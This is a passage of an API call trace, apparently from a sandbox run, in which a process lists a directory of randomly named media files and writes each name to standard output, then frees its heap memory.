_Buffer=0x69b9a8, _BufferCount=0x23, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="mfZck7HwXf4SziBj") returned 16 [0057.284] GetProcessHeap () returned 0x670000 [0057.284] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.284] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.284] GetFileType (hFile=0x80) returned 0x3 [0057.284] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.284] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mfZck7HwXf4SziBj", lpUsedDefaultChar=0x0) returned 17 [0057.284] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x10, lpOverlapped=0x0) returned 1 [0057.285] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.285] GetFileType (hFile=0x80) returned 0x3 [0057.285] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.285] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.285] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moG2C7rzW", cAlternateFileName="")) returned 1 [0057.285] GetProcessHeap () returned 0x670000 [0057.285] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x42) returned 0x69b9a0 [0057.285] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x1c, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="moG2C7rzW") returned 9 [0057.285] GetProcessHeap () returned 0x670000 [0057.285] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.285] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.285] GetFileType (hFile=0x80) returned 0x3 [0057.285] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="moG2C7rzW", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="moG2C7rzW", lpUsedDefaultChar=0x0) returned 10 [0057.286] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x9, lpOverlapped=0x0) returned 1 [0057.286] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.286] GetFileType (hFile=0x80) returned 0x3 [0057.286] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.286] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.286] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa03ee070, ftCreationTime.dwHighDateTime=0x1d5d91a, ftLastAccessTime.dwLowDateTime=0xd7c41440, ftLastAccessTime.dwHighDateTime=0x1d5ddd2, ftLastWriteTime.dwLowDateTime=0xd7c41440, ftLastWriteTime.dwHighDateTime=0x1d5ddd2, nFileSizeHigh=0x0, nFileSizeLow=0x9e5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="n8BHx-R0jAFi.mkv", cAlternateFileName="")) returned 1 [0057.286] GetProcessHeap () returned 0x670000 [0057.286] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x50) returned 0x69b9a0 [0057.286] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x23, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="n8BHx-R0jAFi.mkv") returned 16 [0057.286] GetProcessHeap () returned 0x670000 [0057.287] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.287] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.287] GetFileType (hFile=0x80) returned 0x3 [0057.287] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.287] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="n8BHx-R0jAFi.mkv", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n8BHx-R0jAFi.mkv", lpUsedDefaultChar=0x0) returned 17 [0057.287] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x10, lpOverlapped=0x0) returned 1 [0057.287] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.287] GetFileType (hFile=0x80) returned 0x3 [0057.287] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.287] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.287] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.287] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a2e9240, ftCreationTime.dwHighDateTime=0x1d5e74e, ftLastAccessTime.dwLowDateTime=0x135d9360, ftLastAccessTime.dwHighDateTime=0x1d5e5a2, ftLastWriteTime.dwLowDateTime=0x135d9360, ftLastWriteTime.dwHighDateTime=0x1d5e5a2, nFileSizeHigh=0x0, nFileSizeLow=0x1268a, dwReserved0=0x0, dwReserved1=0x0, cFileName="nF mzbmLsvv0e1OlZm.gif", cAlternateFileName="")) returned 1 [0057.287] GetProcessHeap () returned 0x670000 [0057.287] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x5c) returned 0x69b9a0 [0057.287] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x29, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="nF mzbmLsvv0e1OlZm.gif") returned 22 [0057.288] GetProcessHeap () returned 0x670000 [0057.288] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.288] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.288] GetFileType (hFile=0x80) returned 0x3 [0057.288] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nF mzbmLsvv0e1OlZm.gif", lpUsedDefaultChar=0x0) returned 23 [0057.288] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x16, lpOverlapped=0x0) returned 1 [0057.288] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.288] GetFileType (hFile=0x80) returned 0x3 [0057.288] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.288] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.288] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f75900, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0x87c78630, ftLastAccessTime.dwHighDateTime=0x1d5dc8c, ftLastWriteTime.dwLowDateTime=0x87c78630, ftLastWriteTime.dwHighDateTime=0x1d5dc8c, nFileSizeHigh=0x0, nFileSizeLow=0x578c, dwReserved0=0x0, dwReserved1=0x0, cFileName="q8JQsFRXk.mp4", cAlternateFileName="")) returned 1 [0057.288] GetProcessHeap () returned 0x670000 [0057.288] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4a) returned 0x69b9a0 [0057.288] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x20, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="q8JQsFRXk.mp4") returned 13 [0057.289] GetProcessHeap () returned 0x670000 [0057.289] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.289] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.289] GetFileType (hFile=0x80) returned 0x3 [0057.289] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.289] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="q8JQsFRXk.mp4", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q8JQsFRXk.mp4", lpUsedDefaultChar=0x0) returned 14 [0057.289] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0xd, lpOverlapped=0x0) returned 1 [0057.289] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.289] GetFileType (hFile=0x80) returned 0x3 [0057.289] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.289] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.289] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.289] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6e67780, ftCreationTime.dwHighDateTime=0x1d5e5e6, ftLastAccessTime.dwLowDateTime=0xe2ee22d0, ftLastAccessTime.dwHighDateTime=0x1d5dda4, ftLastWriteTime.dwLowDateTime=0xe2ee22d0, ftLastWriteTime.dwHighDateTime=0x1d5dda4, nFileSizeHigh=0x0, nFileSizeLow=0xffd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RlpYGAIBP9RiAuiDEA1C.bmp", cAlternateFileName="")) returned 1 [0057.289] GetProcessHeap () returned 0x670000 [0057.290] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x60) returned 0x69b9a0 [0057.290] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x2b, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="RlpYGAIBP9RiAuiDEA1C.bmp") returned 24 [0057.290] GetProcessHeap () returned 0x670000 [0057.290] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.290] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.290] GetFileType (hFile=0x80) returned 0x3 [0057.290] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="RlpYGAIBP9RiAuiDEA1C.bmp", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RlpYGAIBP9RiAuiDEA1C.bmp", lpUsedDefaultChar=0x0) returned 25 [0057.290] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x18, lpOverlapped=0x0) returned 1 [0057.290] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.290] GetFileType (hFile=0x80) returned 0x3 [0057.290] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.290] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.291] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="")) returned 1 [0057.291] GetProcessHeap () returned 0x670000 [0057.291] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x50) returned 0x69b9a0 [0057.291] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x23, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="video_driver.exe") returned 16 [0057.291] GetProcessHeap () returned 0x670000 [0057.291] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.291] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.291] GetFileType (hFile=0x80) returned 0x3 [0057.291] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="video_driver.exe", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="video_driver.exe", lpUsedDefaultChar=0x0) returned 17 [0057.291] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x10, lpOverlapped=0x0) returned 1 [0057.291] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.291] GetFileType (hFile=0x80) returned 0x3 [0057.291] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.291] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.292] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd311a320, ftCreationTime.dwHighDateTime=0x1d5e38d, ftLastAccessTime.dwLowDateTime=0xb17b4920, ftLastAccessTime.dwHighDateTime=0x1d5e2e6, ftLastWriteTime.dwLowDateTime=0xb17b4920, ftLastWriteTime.dwHighDateTime=0x1d5e2e6, nFileSizeHigh=0x0, nFileSizeLow=0xeac7, dwReserved0=0x0, dwReserved1=0x0, cFileName="vvdZxZXGy537svJ.mp4", cAlternateFileName="")) returned 1 [0057.292] GetProcessHeap () returned 0x670000 [0057.292] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x56) returned 0x69b9a0 [0057.292] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x26, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="vvdZxZXGy537svJ.mp4") returned 19 [0057.292] GetProcessHeap () returned 0x670000 [0057.292] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.292] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.292] GetFileType (hFile=0x80) returned 0x3 [0057.292] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vvdZxZXGy537svJ.mp4", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vvdZxZXGy537svJ.mp4", lpUsedDefaultChar=0x0) returned 20 [0057.292] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x13, lpOverlapped=0x0) returned 1 [0057.292] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.292] GetFileType (hFile=0x80) returned 0x3 [0057.292] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.292] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.293] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89458a70, ftCreationTime.dwHighDateTime=0x1d5dddb, ftLastAccessTime.dwLowDateTime=0x3cf27a90, ftLastAccessTime.dwHighDateTime=0x1d5d7ee, ftLastWriteTime.dwLowDateTime=0x3cf27a90, ftLastWriteTime.dwHighDateTime=0x1d5d7ee, nFileSizeHigh=0x0, nFileSizeLow=0xb18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yt6rrVQUgdZ1oPy.gif", cAlternateFileName="")) returned 1 [0057.293] GetProcessHeap () returned 0x670000 [0057.293] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x56) returned 0x69b9a0 [0057.293] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x26, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="Yt6rrVQUgdZ1oPy.gif") returned 19 [0057.293] GetProcessHeap () returned 0x670000 [0057.293] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.293] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.293] GetFileType (hFile=0x80) returned 0x3 [0057.293] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Yt6rrVQUgdZ1oPy.gif", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yt6rrVQUgdZ1oPy.gif", lpUsedDefaultChar=0x0) returned 20 [0057.293] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x13, lpOverlapped=0x0) returned 1 [0057.293] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.293] GetFileType (hFile=0x80) returned 0x3 [0057.293] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.293] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.294] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c15a470, ftCreationTime.dwHighDateTime=0x1d5db98, ftLastAccessTime.dwLowDateTime=0x57237f40, ftLastAccessTime.dwHighDateTime=0x1d5e04f, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x0, nFileSizeLow=0x112c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZToX37-PbNpvd.pps", cAlternateFileName="")) returned 1 [0057.294] GetProcessHeap () returned 0x670000 [0057.294] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x69b9a0 [0057.294] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x24, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="ZToX37-PbNpvd.pps") returned 17 [0057.294] GetProcessHeap () returned 0x670000 [0057.294] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.294] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.294] GetFileType (hFile=0x80) returned 0x3 [0057.294] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ZToX37-PbNpvd.pps", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZToX37-PbNpvd.pps", lpUsedDefaultChar=0x0) returned 18 [0057.294] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x11, lpOverlapped=0x0) returned 1 [0057.294] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.294] GetFileType (hFile=0x80) returned 0x3 [0057.294] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.294] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.295] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c15a470, ftCreationTime.dwHighDateTime=0x1d5db98, ftLastAccessTime.dwLowDateTime=0x57237f40, ftLastAccessTime.dwHighDateTime=0x1d5e04f, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x0, nFileSizeLow=0x112c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZToX37-PbNpvd.pps", cAlternateFileName="")) returned 0 [0057.295] GetLastError () returned 0x12 [0057.295] FindClose (in: hFindFile=0x68b958 | out: hFindFile=0x68b958) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68b148 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68b0e8 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x680048 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68ae88 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x683540 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6832e0 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x682fd8 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6830c0 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x683080 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x684e70 | out: hHeap=0x670000) returned 1 [0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x683040 | out: hHeap=0x670000) returned 1 